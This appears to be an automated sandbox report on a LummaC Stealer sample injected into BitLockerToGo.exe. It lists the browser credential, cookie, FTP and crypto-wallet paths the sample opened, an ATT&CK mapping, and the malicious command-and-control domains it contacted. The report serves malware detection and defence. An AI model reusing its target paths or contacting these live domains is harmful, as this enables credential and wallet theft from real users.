Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior

Source: Yara match	File source: 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2470652028.000000000301B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2448144010.000000000301B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2484428826.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2485459206.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2502480428.0000000003025000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2500622439.000000000301B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2502274755.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2484171723.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2502495771.000000000302A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3060, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3060, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	24%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
seallysl.site	172.67.180.76	true	true		unknown
servicedny.site	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
contemteny.site	true	unknown
opposezmny.site	true	unknown
servicedny.site	true	unknown
goalyfeastz.site	true	unknown
authorisev.site	true	unknown
faulteyotk.site	true	unknown
seallysl.site	true	unknown
https://seallysl.site/api	true	unknown
dilemmadu.site	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/aws/jsii	file.exe, program.js.0.dr	false		unknown
http://json-schema.org/schema	file.exe, program.js.0.dr	false		unknown
https://seallysl.site/DQ	BitLockerToGo.exe, 00000002.00000003.2516470970.00000000052C2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://seallysl.site/b	BitLockerToGo.exe, 00000002.00000003.2485459206.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484428826.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484171723.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/jprichardson/node-fs-extra/issues/269	program.js.0.dr	false		unknown
https://seallysl.site/U	BitLockerToGo.exe, 00000002.00000002.2571729075.0000000003034000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	BitLockerToGo.exe, 00000002.00000003.2485863021.00000000052B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/	BitLockerToGo.exe, 00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2557511485.0000000003034000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500758150.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484195825.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#	program.js.0.dr	false		unknown
http://json-schema.org/draft-07/schema	file.exe, program.js.0.dr	false		unknown
https://seallysl.site/gfj	BitLockerToGo.exe, 00000002.00000003.2502388352.00000000052C2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484010683.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2470478050.00000000052C0000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500758150.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484195825.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.opengis.net/gml	file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.collada.org/2005/11/COLLADASchema	file.exe, 00000000.00000002.2423108104.0000000002416000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.topografix.com/GPX/1/1	file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.opengis.net/gml/3.2	file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 00000002.00000003.2485547940.00000000053D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.mozilla.or	BitLockerToGo.exe, 00000002.00000003.2485411107.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://seallysl.site/p	BitLockerToGo.exe, 00000002.00000002.2571585252.0000000003017000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://json-schema.org/draft-07/schema#	program.js.0.dr	false		unknown
https://aws.amazon.com	file.exe, program.js.0.dr	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	BitLockerToGo.exe, 00000002.00000003.2485863021.00000000052B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site:443/api=usere	BitLockerToGo.exe, 00000002.00000002.2571585252.000000000301E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 00000002.00000003.2485863021.00000000052B9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BitLockerToGo.exe, 00000002.00000003.2485547940.00000000053D0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	BitLockerToGo.exe, 00000002.00000003.2448501963.00000000052FD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449299743.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2449230272.00000000052FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/G	BitLockerToGo.exe, 00000002.00000003.2485459206.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484428826.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2500622439.000000000301B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2484171723.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/aws/jsii.git	file.exe, program.js.0.dr	false		unknown
https://seallysl.site:443/apiM)	BitLockerToGo.exe, 00000002.00000003.2500622439.000000000301B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://seallysl.site/apid	BitLockerToGo.exe, 00000002.00000002.2571729075.0000000003034000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.micro	BitLockerToGo.exe, 00000002.00000003.2557453027.000000000300E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/apigsp	BitLockerToGo.exe, 00000002.00000003.2568341431.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2571470730.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://seallysl.site:443/api	BitLockerToGo.exe, 00000002.00000003.2502274755.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2502460777.0000000003031000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://earth.google.com/kml/2.2	file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://earth.google.com/kml/2.0	file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://earth.google.com/kml/2.1	file.exe, 00000000.00000002.2423108104.0000000002414000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	BitLockerToGo.exe, 00000002.00000003.2484453029.00000000052FD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
